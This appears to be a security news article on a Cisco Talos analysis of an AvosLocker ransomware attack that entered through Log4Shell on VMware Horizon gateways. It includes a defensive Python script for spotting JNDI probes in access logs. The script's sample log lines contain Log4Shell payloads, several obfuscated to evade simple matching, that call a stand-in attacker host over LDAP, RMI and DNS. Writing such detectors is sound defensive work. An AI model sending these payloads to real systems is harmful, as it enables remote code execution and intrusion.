Researchers have disclosed details on a ransomware attack that exploited the well-known Log4j flaw (Log4Shell) to deploy AvosLocker.
The month-long ransomware attack, which impacted an unnamed company, targeted instances of the VMware Horizon Unified Access Gateway (UAG) that were still vulnerable to the Log4j flaw. The attacker first exploited the series of Apache Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832) that can allow remote code execution on vulnerable Unified Access Gateways in the context of a low-privilege, non-root user (‘gateway’). Of these, the remote code execution paths are CVE-2021-44228 and CVE-2021-45046; CVE-2021-45105 is a denial-of-service flaw and CVE-2021-44832 requires control of the logging configuration. The threat actors used a newer variant of AvosLocker, discovered earlier this year, that targets Linux environments in addition to Windows machines; the attack, coupled with these recent changes, demonstrates that AvosLocker is "likely to proliferate in the future," Cisco Talos researchers said in a Tuesday analysis.
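Exploitation of the UAG works by getting a `${jndi:...}` lookup string into any field the gateway logs through Log4j, and attackers routinely wrap the keyword in nested lookups or URL encoding so that a naive search for the literal `${jndi:` misses it. The following is an added example, not code from the Talos report or from VMware: a small Python detector that normalizes those obfuscation layers in access-log lines and reports the source IP and the JNDI scheme requested. The log lines are constructed for illustration (RFC 5737 addresses), the `/portal/` path is assumed, and the obfuscation forms handled (`${lower:}`, `${upper:}`, `${x:-default}` lookups and percent-encoding) are the common ones, not an exhaustive list.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the Talos report or any real victim).
# Line 1 is benign; lines 2-5 carry a JNDI lookup in the User-Agent or query string,
# each obfuscated differently to evade naive "${jndi:" string matching.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Feb/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Feb/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"
203.0.113.7 - - [07/Feb/2022:10:01:15 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/a}"
203.0.113.7 - - [07/Feb/2022:10:01:21 +0000] "GET /portal/?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%3A1099%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"
203.0.113.7 - - [07/Feb/2022:10:01:30 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.7/x}"
"""

# Log4j lookup forms that evaluate to a literal and are used to hide the "jndi" keyword.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")   # ${::-j}, ${env:X:-j}, ${sys:x:-j}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def normalize_lookup(s: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and Log4j lookup obfuscation so a ${jndi:...} becomes visible.

    Innermost lookups are rewritten first (the patterns exclude nested braces) and
    the pass repeats until nothing changes, because payloads nest several layers.
    """
    for _ in range(max_rounds):
        prev = s
        s = unquote(s)
        s = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            s,
        )
        s = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), s)
        if s == prev:
            break
    return s


def find_jndi_probes(log_text: str) -> list:
    """Return one record per log line that carries a (possibly obfuscated) JNDI lookup."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        decoded = normalize_lookup(line)
        m = _JNDI.search(decoded)
        if not m:
            continue
        hits.append({
            "line": line_no,
            "source_ip": line.split(" ", 1)[0],          # first token of a combined-format line
            "scheme": m.group(1).lower(),                # ldap, rmi, dns, ...
            "obfuscated": "${jndi:" not in line.lower(), # was the keyword hidden in the raw line?
            "decoded": decoded,
        })
    return hits


if __name__ == "__main__":
    for hit in find_jndi_probes(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['source_ip']} jndi scheme={hit['scheme']} "
              f"obfuscated={hit['obfuscated']}")
```

Run against the sample, this flags lines 2 through 5 and leaves the benign request alone. Two caveats a defender should keep in mind: the access log only shows fields the web tier records, while Log4j evaluates any logged value (headers, form fields, internal messages), so on an appliance such as the UAG the decisive signal is usually outbound LDAP, RMI or DNS traffic from the gateway service rather than the inbound string; and no normalizer covers every lookup variant, so treat a hit as confirmation and a miss as inconclusive.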
"In the current ransomware cartel landscape [this recent attack] could be either an affiliate using their own TTPs or a new behavior that has been provided as part of the procedures provided by the cartel," said Guilherme Venere, researcher with Cisco Talos. "We commonly see these groups start leveraging new vulnerabilities in their attacks, for instance."
AvosLocker was first spotted in late June 2021 by researchers who called it “a solid, yet not too fancy new ransomware family.” Researchers with Sophos later in the year noted that ransomware attacks using AvosLocker started to increase in November and December. Some AvosLocker affiliates have used Microsoft Exchange server vulnerabilities as an intrusion vector, including the ProxyShell vulnerabilities (CVE-2021-31207, CVE-2021-34523 and CVE-2021-34473) and CVE-2021-26855, the ProxyLogon server-side request forgery flaw in Exchange. In other cases, AvosLocker has been spread through spam email campaigns and malvertising; because the ransomware operates on an affiliate model, however, the TTPs used to carry out attacks vary from intrusion to intrusion.
"We continue to see ransomware grow and evolve over time... Whether it is new cartels forming, new affiliates joining a cartel, or the cartel itself rebranding we continually see these groups evolve and change," said Venere. "This can include adding new vulnerabilities for exploitation, changing the tooling that the affiliates use, or changes in the ransomware that is being deployed. Avos is yet another example in these cartels."
Researchers were first notified of the incident on March 7, but activity related to the attack was traced back as early as Feb. 7. After some brief activity following initial access, the actor went silent for a few weeks, then, a month later, began deploying several different tools, including a Cobalt Strike beacon, the Sliver red-team framework and a network scanner (“Scanner.exe,” SoftPerfect Network Scanner, a commercially available product that AvosLocker operators have been known to deploy). Days later, the AvosLocker payload was finally delivered, with the attackers using PDQ Deploy, a legitimate software deployment tool, to push the ransomware and other tooling across the target network, said researchers. The victim’s files were then encrypted and a ransom note left with payment instructions.
Researchers also uncovered “significant evidence” that multiple threat actors had compromised the same victim network, which is not uncommon, particularly in environments that still have not patched against widely exploited vulnerabilities like Log4j. In this incident, a RuntimeBrokerService.exe executable in "C:\Windows\System32\temp" had created a file (“watcher.exe”) that appeared to be related to a cryptocurrency miner.
“It is not uncommon for a miner to be deployed alongside ransomware in an attempt to passively increase revenue,” said researchers. “However, there is significant evidence that multiple threat actors had compromised this network, as DarkComet [RAT] samples unrelated to this campaign were also discovered.”
Researchers stressed that a layered defense model is critical for businesses to be able to detect and protect against the post-exploitation activity seen in this campaign. One security measure is patch management: after the Log4j flaw was first disclosed in December, VMware released builds with patches that address the flaw in its Horizon products and “highly recommended” that customers install the updates. Meanwhile, exploitation attempts have continued over the past few months, especially against deployments that remain unpatched.
At the same time, after the threat actor gained initial access in this attack, “the inner-transit firewalls that could control or limit the access to the internal infrastructure were not configured, hence, the attackers used it as the initial access to establish a foothold on the customer's network, granting access to their internal servers,” said Cisco Talos researchers.
“This incident showcases the importance of ensuring that security appliances are properly set up and configured, updates and patches are applied and the security team is always monitoring alerts,” they said. “While the attack techniques used in this campaign are not novel, they are still effective if the proper precautions are not in place.”